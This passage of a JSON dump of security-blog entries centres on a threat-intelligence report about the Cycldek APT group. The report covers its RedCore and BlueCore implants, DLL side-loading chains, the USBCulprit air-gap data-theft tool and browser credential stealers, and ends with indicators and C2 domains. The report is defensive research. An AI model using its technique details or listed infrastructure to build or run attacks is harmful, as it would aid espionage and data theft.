intensity of the measures being imposed in different countries to stop the spread of the virus, we&#x27;ll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-09T10:00:28", "type": "securelist", "title": "Spam and phishing in 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2022-02-09T10:00:28", "id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T11:50:54", "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**__Figure 1_: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster's implant are summarized in the table below.\n\n| **BlueCore** | **RedCore** | \n---|---|---|--- \nInitial Infection Vector | RTF documents | Unknown | \nLegitimate AV Utility | QcConcol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) | \nSide-Loaded DLL | QcLite.dll | wsc.dll | \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm -contains PE loading shellcode and and an encrypted RedCore binary | \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe | \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or\n\nC:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini | \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6},\n\n{F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB},\n\n{E68DFA68-1132-4A32-ADE2-8C87F282C457},\n\n{728264DE-3701-419B-84A4-2AD86B0C43A3},\n\n{2BCD5B61-288C-44D5-BA0D-AAA00E9D2273},\n\n{D9AE3AB0-D123-4F38-A9BE-898C8D49A214} | \nCommunicated URL Scheme | http://%s:%d/link?url=%s&amp;enpl=%s&amp;encd=%s | http://%s:%d/search.jsp?referer=%s&amp;kw=%s&amp;psid=%s\n\nor\n\nhttp://%s:%d/search.jsp?url=%s&amp;referer=%s&amp;kw=%s&amp;psid=%s | \n \n_**_Table 1_: Comparison of BlueCore and RedCore loader and implant traits.** _\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**__Figure_ 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**__Figure 3_: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&amp;C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&amp;C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&amp;C and inform it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&amp;C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&amp;C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&amp;C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n**__Figure 4_: Difference in URL scheme used by each implant for C2 communication._**\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&amp;Cs, are outlined in the figures below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_**_Figure 5_: Volume of downloaded samples from C&amp;Cs of each cluster by country and month, since mid-2018.** _\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources \u2013 both code and infrastructure \u2013 and operating under a single organizational umbrella.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_**_Figure 6_: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.** _\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools \u2013 some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (Sysinternals tools used to dump memory, possibly to obtain passwords from running processes), Nbtscan (command line utility intended to scan IP networks for NetBIOS information) and PsExec (Sysinternals tools used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor: **an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n_**_Figure 7_: Command line usage of the custom HDoor tool.** _\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&amp;C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble this one:\n \n \n {\n \"domain\": \".google.com\",\n \"id\": 1,\n \"name\": \"NID\",\n \"path\": \"/\",\n \"value\": \"%VALUE%\"\n }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n**__Figure 8_: Command line usage of the ChromePass tool._**\n\n#### \n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulrpit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro) forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n**__Figure 9_: USBCulprit's loading flow, as observed in samples after 2017._**\n\nOnce USBCulprit is loaded to memory and executed, it operates in three phases:\n\n * **Boostrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with either one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that enlists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000' corresponding to 01/06/2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB is connected, the malware will verify if stolen data should be exfiltrated to it or it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' will be searched in the drive and if not found, will be created. This directory will be used as the target path for copying files to the drive or source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched locally. If it exists, the malware would expect to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempt to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n**__Figure 10_: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._**\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' will be checked locally to decide if lateral movement should be conducted or not. Only if this file exists, will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples for these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}.Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n**__Figure 11_: Commands used to profile the network connectivity of the compromised host._**\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and could not be found as artifacts elsewhere in our investigation, point to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated to the group give an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. Perhaps it's worth noting that we noted multiple points where such entities didn't work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased \u2013 it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.\n\n**RedCore**:\n\nA6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL) \n4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)\n\n**BlueCore**:\n\n1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL) \n6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL) \n6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL) \n600E14E4B0035C6F0C6A344D87B6C27F- stdole.tlb (encrypted Shellcode and Implant)\n\n**Lateral Movement and Info-Stealing Toolset:**\n\n1640EE7A414DFF996AF8265E0947DE36 Chromepass \n1EA07468EBDFD3D9EEC59AC57A490701 Chromepass \n07EE1B99660C8CD5207E128F44AA8CBC JsonCookies \n809196A64CA4A32860D28760267A1A8B Custom HDoor \n81660985276CF9B6D979753B6E581D34 Custom HDoor \nA44804C2767DCCD4902AAE30C36E62C0 Custom HDoor\n\n \n\n**USBCulprit: **\n\nA9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader \nC73B000313DCD2289F51B367F744DCD8 USBCulprit Loader \n2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader \n4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader \n6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader \n7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader \n782FF651F34C87448E4503B5444B6164 USBCulprit Loader \n88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader \nA4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader \n3CA7BD71B30007FC30717290BB437152 USBCulprit Payload \n58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload \nA02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload \nD8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload \n2E522CE8104C0693288C997604AE0096 USBCulrprit Payload\n\n \n\n**Toolset overlapping in both clusters:**\n\n**Common Name ** | **MD5** | **Blue Cluster Domain** | **Red Cluster Domain** | **Description** \n---|---|---|---|--- \nchromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080\n\n | http://news.trungtamwtoa.com:88 | ChromePass \ngoopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443\n\nhttp://hcm.vietbaonam.com:443 | USBCulprit \n2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080\n\nttp://tinmoi.thoitietdulich.com:443\n\nhttp://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53\n\nhttp://tinmoi.vieclamthemde.com | USBCulprit \nqclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com\n\nhttp://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL \nsilverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443\n\nhttp://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53\n\nhttp://info.coreders.com:8080 | Custom HDoor \n \n \n\n**C&amp;Cs and Dropzones**:\n\nhttp://web.laovoanew[.]com - Red Cluster\n\nhttp://tinmoi.vieclamthemde[.]com - Red Cluster\n\nhttp://kinhte.chototem[.]com - Red Cluster\n\nhttp://news.trungtamwtoa[.]com - Red Cluster\n\nhttp://mychau.dongnain[.]com - Red Cluster\n\nhttp://hcm.vietbaonam[.]com - Red Cluster\n\nhttp://login.thanhnienthegioi[.]com - Red Cluster\n\nhttp://103.253.25.73 - Red Cluster\n\nhttp://luan.conglyan[.]com - Red Cluster\n\nhttp://toiyeuvn.dongaruou[.]com - Red Cluster\n\nhttp://tintuc.daikynguyen21[.]com - Red Cluster\n\nhttp://web.laomoodwin[.]com - Red Cluster\n\nhttp://login.giaoxuchuson[.]com - Red Cluster\n\nhttp://lat.conglyan[.]com - Red Cluster\n\nhttp://thegioi.kinhtevanhoa[.]com - Red Cluster\n\nhttp://laovoanew[.]com - Red Cluster\n\nhttp://cdn.laokpl[.]com - Red Cluster\n\nhttp://login.dangquanwatch[.]com - Blue Cluster\n\nhttp://info.coreders[.]com - Blue Cluster\n\nhttp://thanhnien.vietnannnet[.]com - Blue Cluster\n\nhttp://login.diendanlichsu[.]com - Blue Cluster\n\nhttp://login.vietnamfar[.]com - Blue Cluster\n\nhttp://cophieu.dcsvnqvmn[.]com - Blue Cluster\n\nhttp://nghiencuu.onetotechnologys[.]com - Blue Cluster\n\nhttp://tinmoi.thoitietdulich[.]com - Blue Cluster\n\nhttp://khinhte.chinhsech[.]com - Blue Cluster\n\nhttp://images.webprogobest[.]com - Blue Cluster\n\nhttp://web.hcmuafgh[.]com - Blue Cluster\n\nhttp://news.cooodkord[.]com - Blue Cluster\n\nhttp://24h.tinthethaoi[.]com - Blue Cluster\n\nhttp://quocphong.ministop14[.]com - Blue Cluster\n\nhttp://nhantai.xmeyeugh[.]com - Blue Cluster\n\nhttp://thoitiet.yrindovn[.]com - Blue Cluster\n\nhttp://hanghoa.trenduang[.]com - Blue Cluster", "cvss3": {}, "published": "2020-06-03T10:00:32", "type": "securelist", "title": "Cycldek: Bridging the (air) gap", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-03T10:00:32", "id": "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "href": "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-29T10:36:40", "description": "\n\n## Targeted attacks and malware campaigns\n\n### Mobile espionage targeting the Middle East\n\nAt the end of June we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker' involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built an open-source legitimate 'Conversations' messenger that included the malicious code. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).\n\n### APT33 beefs up its toolset\n\nIn July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year \u2013 tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.\n\n### New FinSpy iOS and Android implants found in the wild\n\nWe recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices \u2013 suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.\n\n### Turla revamps its toolset\n\nTurla (aka Venomous Bear, Uroboros and Waterbug), a high profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new.NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware 